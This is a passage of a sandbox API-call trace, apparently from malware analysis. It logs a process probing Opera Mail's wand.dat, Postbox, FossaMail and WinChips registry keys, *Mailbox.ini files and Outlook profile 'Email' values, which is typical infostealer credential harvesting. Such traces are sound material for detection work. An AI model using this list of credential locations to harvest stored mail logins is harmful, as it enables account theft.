hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0115.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.003] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Mail\\Opera Mail\\wand.dat") returned 0 [0115.003] GetProcessHeap () returned 0x5b0000 [0115.003] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0115.003] GetProcessHeap () returned 0x5b0000 [0115.003] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cb930 [0115.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.005] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Postbox\\Postbox", pszValue="CurrentVersion", pdwType=0x0, pvData=0x5cb930, pcbData=0xdfba4*=0x104 | out: pdwType=0x0, pvData=0x5cb930, pcbData=0xdfba4*=0x104) returned 0x2 [0115.005] GetProcessHeap () returned 0x5b0000 [0115.005] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0115.005] GetProcessHeap () returned 0x5b0000 [0115.005] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cb930 [0115.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.006] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\FossaMail", pszValue="CurrentVersion", pdwType=0x0, pvData=0x5cb930, pcbData=0xdfba4*=0x104 | out: pdwType=0x0, pvData=0x5cb930, pcbData=0xdfba4*=0x104) returned 0x2 [0115.006] GetProcessHeap () returned 0x5b0000 [0115.007] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0115.007] GetProcessHeap () returned 0x5b0000 [0115.007] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0115.007] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0115.008] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0115.009] Sleep (dwMilliseconds=0xa) [0115.021] GetProcessHeap () returned 0x5b0000 [0115.021] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5cb930 [0115.022] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0115.022] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s", arglist=0xdf8f4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*Mailbox.ini") returned 44 [0115.023] GetProcessHeap () returned 0x5b0000 [0115.023] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5c) returned 0x5caba0 [0115.023] GetProcessHeap () returned 0x5b0000 [0115.023] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0115.023] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*Mailbox.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*mailbox.ini"), lpFindFileData=0xdf908 | out: lpFindFileData=0xdf908*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x5b7670, ftLastWriteTime.dwHighDateTime=0x5b7670, nFileSizeHigh=0x5bb890, nFileSizeLow=0x5bbe98, dwReserved0=0x0, dwReserved1=0xdf964, cFileName="ը眠", cAlternateFileName="뒭蕬͈읩맄ィﭬ\r䂑@")) returned 0xffffffff [0115.024] GetProcessHeap () returned 0x5b0000 [0115.024] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caba0 | out: hHeap=0x5b0000) returned 1 [0115.024] GetProcessHeap () returned 0x5b0000 [0115.025] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0115.025] GetProcessHeap () returned 0x5b0000 [0115.025] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e8) returned 0x5cb930 [0115.025] GetProcessHeap () returned 0x5b0000 [0115.025] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5bc1b8 [0115.025] GetProcessHeap () returned 0x5b0000 [0115.025] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8d0 [0115.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.026] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\WinChips\\UserAccounts", phkResult=0x5ca8d0 | out: phkResult=0x5ca8d0*=0x0) returned 0x2 [0115.026] GetProcessHeap () returned 0x5b0000 [0115.026] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8d0 | out: hHeap=0x5b0000) returned 1 [0115.026] GetProcessHeap () returned 0x5b0000 [0115.027] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0115.027] GetProcessHeap () returned 0x5b0000 [0115.027] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc1b8 | out: hHeap=0x5b0000) returned 1 [0115.027] GetProcessHeap () returned 0x5b0000 [0115.027] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e8) returned 0x5cb930 [0115.027] GetProcessHeap () returned 0x5b0000 [0115.027] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5bc1b8 [0115.027] GetProcessHeap () returned 0x5b0000 [0115.027] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa60 [0115.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.028] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", phkResult=0x5caa60 | out: phkResult=0x5caa60*=0x0) returned 0x2 [0115.028] GetProcessHeap () returned 0x5b0000 [0115.028] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa60 | out: hHeap=0x5b0000) returned 1 [0115.028] GetProcessHeap () returned 0x5b0000 [0115.028] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa30 [0115.029] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.030] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook", phkResult=0x5caa30 | out: phkResult=0x5caa30*=0x0) returned 0x2 [0115.030] GetProcessHeap () returned 0x5b0000 [0115.030] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa30 | out: hHeap=0x5b0000) returned 1 [0115.030] GetProcessHeap () returned 0x5b0000 [0115.030] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9e0 [0115.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.031] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook", phkResult=0x5ca9e0 | out: phkResult=0x5ca9e0*=0x204) returned 0x0 [0115.031] GetProcessHeap () returned 0x5b0000 [0115.032] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cbd20 [0115.032] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.032] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x5cbd20, pcchName=0xdfb7c | out: pszName="0a0d020000000000c000000000000046", pcchName=0xdfb7c) returned 0x0 [0115.033] GetProcessHeap () returned 0x5b0000 [0115.033] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa30 [0115.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.034] RegOpenKeyW (in: hKey=0x204, lpSubKey="0a0d020000000000c000000000000046", phkResult=0x5caa30 | out: phkResult=0x5caa30*=0x1fc) returned 0x0 [0115.034] GetProcessHeap () returned 0x5b0000 [0115.034] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0115.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.036] SHQueryValueExW (in: hkey=0x1fc, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208 | out: pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208) returned 0x2 [0115.036] GetProcessHeap () returned 0x5b0000 [0115.037] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.037] GetProcessHeap () returned 0x5b0000 [0115.037] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5cc138 [0115.038] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0115.038] wvsprintfW (in: param_1=0x5cc138, param_2="%s\\%s", arglist=0xdfb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046") returned 88 [0115.038] GetProcessHeap () returned 0x5b0000 [0115.038] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb4) returned 0x5c9390 [0115.038] GetProcessHeap () returned 0x5b0000 [0115.039] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.039] GetProcessHeap () returned 0x5b0000 [0115.039] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9f0 [0115.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.040] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", phkResult=0x5ca9f0 | out: phkResult=0x5ca9f0*=0x1f0) returned 0x0 [0115.040] GetProcessHeap () returned 0x5b0000 [0115.040] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0115.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.041] SHEnumKeyExW (in: hkey=0x1f0, dwIndex=0x0, pszName=0x5cc138, pcchName=0xdfb4c | out: pszName="", pcchName=0xdfb4c) returned 0x103 [0115.041] GetProcessHeap () returned 0x5b0000 [0115.042] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.043] RegCloseKey (hKey=0x1f0) returned 0x0 [0115.043] GetProcessHeap () returned 0x5b0000 [0115.043] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9f0 | out: hHeap=0x5b0000) returned 1 [0115.043] GetProcessHeap () returned 0x5b0000 [0115.043] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0115.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.044] RegCloseKey (hKey=0x1fc) returned 0x0 [0115.045] GetProcessHeap () returned 0x5b0000 [0115.045] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa30 | out: hHeap=0x5b0000) returned 1 [0115.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.045] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x1, pszName=0x5cbd20, pcchName=0xdfb7c | out: pszName="13dbb0c8aa05101a9bb000aa002fc45a", pcchName=0xdfb7c) returned 0x0 [0115.046] GetProcessHeap () returned 0x5b0000 [0115.046] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa30 [0115.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.047] RegOpenKeyW (in: hKey=0x204, lpSubKey="13dbb0c8aa05101a9bb000aa002fc45a", phkResult=0x5caa30 | out: phkResult=0x5caa30*=0x1fc) returned 0x0 [0115.047] GetProcessHeap () returned 0x5b0000 [0115.047] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0115.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.048] SHQueryValueExW (in: hkey=0x1fc, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208 | out: pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208) returned 0x2 [0115.048] GetProcessHeap () returned 0x5b0000 [0115.048] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.048] GetProcessHeap () returned 0x5b0000 [0115.048] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5cc138 [0115.049] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0115.049] wvsprintfW (in: param_1=0x5cc138, param_2="%s\\%s", arglist=0xdfb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a") returned 88 [0115.049] GetProcessHeap () returned 0x5b0000 [0115.049] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb4) returned 0x5c9390 [0115.049] GetProcessHeap () returned 0x5b0000 [0115.050] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.050] GetProcessHeap () returned 0x5b0000 [0115.050] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa80 [0115.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.051] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", phkResult=0x5caa80 | out: phkResult=0x5caa80*=0x1f0) returned 0x0 [0115.051] GetProcessHeap () returned 0x5b0000 [0115.051] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0115.052] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.052] SHEnumKeyExW (in: hkey=0x1f0, dwIndex=0x0, pszName=0x5cc138, pcchName=0xdfb4c | out: pszName="", pcchName=0xdfb4c) returned 0x103 [0115.052] GetProcessHeap () returned 0x5b0000 [0115.053] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.054] RegCloseKey (hKey=0x1f0) returned 0x0 [0115.054] GetProcessHeap () returned 0x5b0000 [0115.054] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa80 | out: hHeap=0x5b0000) returned 1 [0115.054] GetProcessHeap () returned 0x5b0000 [0115.054] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0115.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.055] RegCloseKey (hKey=0x1fc) returned 0x0 [0115.055] GetProcessHeap () returned 0x5b0000 [0115.055] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa30 | out: hHeap=0x5b0000) returned 1 [0115.056] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.056] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x2, pszName=0x5cbd20, pcchName=0xdfb7c | out: pszName="2db91c5fd8470d46b1a5bc5efab4cae7", pcchName=0xdfb7c) returned 0x0 [0115.056] GetProcessHeap () returned 0x5b0000 [0115.056] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca910 [0115.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.058] RegOpenKeyW (in: hKey=0x204, lpSubKey="2db91c5fd8470d46b1a5bc5efab4cae7", phkResult=0x5ca910 | out: phkResult=0x5ca910*=0x1fc) returned 0x0 [0115.058] GetProcessHeap () returned 0x5b0000 [0115.058] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0115.058] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.059] SHQueryValueExW (in: hkey=0x1fc, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208 | out: pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208) returned 0x2 [0115.059] GetProcessHeap () returned 0x5b0000 [0115.059] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.059] GetProcessHeap () returned 0x5b0000 [0115.059] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5cc138 [0115.060] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0115.060] wvsprintfW (in: param_1=0x5cc138, param_2="%s\\%s", arglist=0xdfb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\2db91c5fd8470d46b1a5bc5efab4cae7") returned 88 [0115.060] GetProcessHeap () returned 0x5b0000 [0115.060] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb4) returned 0x5c9390 [0115.060] GetProcessHeap () returned 0x5b0000 [0115.061] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.061] GetProcessHeap () returned 0x5b0000 [0115.061] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca920 [0115.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.062] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\2db91c5fd8470d46b1a5bc5efab4cae7", phkResult=0x5ca920 | out: phkResult=0x5ca920*=0x1f0) returned 0x0 [0115.062] GetProcessHeap () returned 0x5b0000 [0115.062] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0115.063] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.063] SHEnumKeyExW (in: hkey=0x1f0, dwIndex=0x0, pszName=0x5cc138, pcchName=0xdfb4c | out: pszName="", pcchName=0xdfb4c) returned 0x103 [0115.063] GetProcessHeap () returned 0x5b0000 [0115.063] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.064] RegCloseKey (hKey=0x1f0) returned 0x0 [0115.064] GetProcessHeap () returned 0x5b0000 [0115.064] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca920 | out: hHeap=0x5b0000) returned 1 [0115.064] GetProcessHeap () returned 0x5b0000 [0115.065] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0115.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.066] RegCloseKey (hKey=0x1fc) returned 0x0 [0115.066] GetProcessHeap () returned 0x5b0000 [0115.066] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca910 | out: hHeap=0x5b0000) returned 1 [0115.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.074] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x3, pszName=0x5cbd20, pcchName=0xdfb7c | out: pszName="3517490d76624c419a828607e2a54604", pcchName=0xdfb7c) returned 0x0 [0115.074] GetProcessHeap () returned 0x5b0000 [0115.074] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa30 [0115.075] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.075] RegOpenKeyW (in: hKey=0x204, lpSubKey="3517490d76624c419a828607e2a54604", phkResult=0x5caa30 | out: phkResult=0x5caa30*=0x1fc) returned 0x0 [0115.076] GetProcessHeap () returned 0x5b0000 [0115.076] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0115.076] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.076] SHQueryValueExW (in: hkey=0x1fc, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208 | out: pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208) returned 0x2 [0115.076] GetProcessHeap () returned 0x5b0000 [0115.077] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.077] GetProcessHeap () returned 0x5b0000 [0115.077] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5cc138 [0115.077] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0115.078] wvsprintfW (in: param_1=0x5cc138, param_2="%s\\%s", arglist=0xdfb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604") returned 88 [0115.078] GetProcessHeap () returned 0x5b0000 [0115.078] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb4) returned 0x5c9390 [0115.078] GetProcessHeap () returned 0x5b0000 [0115.079] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.079] GetProcessHeap () returned 0x5b0000 [0115.079] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8b0 [0115.079] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.080] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", phkResult=0x5ca8b0 | out: phkResult=0x5ca8b0*=0x1f0) returned 0x0 [0115.080] GetProcessHeap () returned 0x5b0000 [0115.080] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0115.080] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.081] SHEnumKeyExW (in: hkey=0x1f0, dwIndex=0x0, pszName=0x5cc138, pcchName=0xdfb4c | out: pszName="", pcchName=0xdfb4c) returned 0x103 [0115.081] GetProcessHeap () returned 0x5b0000 [0115.081] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.084] RegCloseKey (hKey=0x1f0) returned 0x0 [0115.084] GetProcessHeap () returned 0x5b0000 [0115.084] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8b0 | out: hHeap=0x5b0000) returned 1 [0115.085] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0115.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.086] RegCloseKey (hKey=0x1fc) returned 0x0 [0115.086] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa30 | out: hHeap=0x5b0000) returned 1 [0115.086] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.086] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x4, pszName=0x5cbd20, pcchName=0xdfb7c | out: pszName="6c29d51f56390b45a924b3b787013a66", pcchName=0xdfb7c) returned 0x0 [0115.087] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa50 [0115.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.088] RegOpenKeyW (in: hKey=0x204, lpSubKey="6c29d51f56390b45a924b3b787013a66", phkResult=0x5caa50 | out: phkResult=0x5caa50*=0x1fc) returned 0x0 [0115.088] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0115.089] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.089] SHQueryValueExW (in: hkey=0x1fc, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208 | out: pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208) returned 0x2 [0115.090] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.090] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5cc138 [0115.090] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0115.091] wvsprintfW (in: param_1=0x5cc138, param_2="%s\\%s", arglist=0xdfb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\6c29d51f56390b45a924b3b787013a66") returned 88 [0115.091] GetProcessHeap () returned 0x5b0000 [0115.091] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb4) returned 0x5c9390 [0115.091] GetProcessHeap () returned 0x5b0000 [0115.091] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.091] GetProcessHeap () returned 0x5b0000 [0115.092] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa60 [0115.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.093] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\6c29d51f56390b45a924b3b787013a66", phkResult=0x5caa60 | out: phkResult=0x5caa60*=0x1f0) returned 0x0 [0115.093] GetProcessHeap () returned 0x5b0000 [0115.093] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0115.093] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.094] SHEnumKeyExW (in: hkey=0x1f0, dwIndex=0x0, pszName=0x5cc138, pcchName=0xdfb4c | out: pszName="", pcchName=0xdfb4c) returned 0x103 [0115.094] GetProcessHeap () returned 0x5b0000 [0115.094] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.095] RegCloseKey (hKey=0x1f0) returned 0x0 [0115.095] GetProcessHeap () returned 0x5b0000 [0115.095] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa60 | out: hHeap=0x5b0000) returned 1 [0115.095] GetProcessHeap () returned 0x5b0000 [0115.095] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0115.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.097] RegCloseKey (hKey=0x1fc) returned 0x0 [0115.097] GetProcessHeap () returned 0x5b0000 [0115.097] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa50 | out: hHeap=0x5b0000) returned 1 [0115.097] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.098] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x5, pszName=0x5cbd20, pcchName=0xdfb7c | out: pszName="8503020000000000c000000000000046", pcchName=0xdfb7c) returned 0x0 [0115.098] GetProcessHeap () returned 0x5b0000 [0115.098] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa10 [0115.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.100] RegOpenKeyW (in: hKey=0x204, lpSubKey="8503020000000000c000000000000046", phkResult=0x5caa10 | out: phkResult=0x5caa10*=0x1fc) returned 0x0 [0115.100] GetProcessHeap () returned 0x5b0000 [0115.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0115.100] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.100] SHQueryValueExW (in: hkey=0x1fc, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208 | out: pdwType=0x0, pvData=0x5cc138, 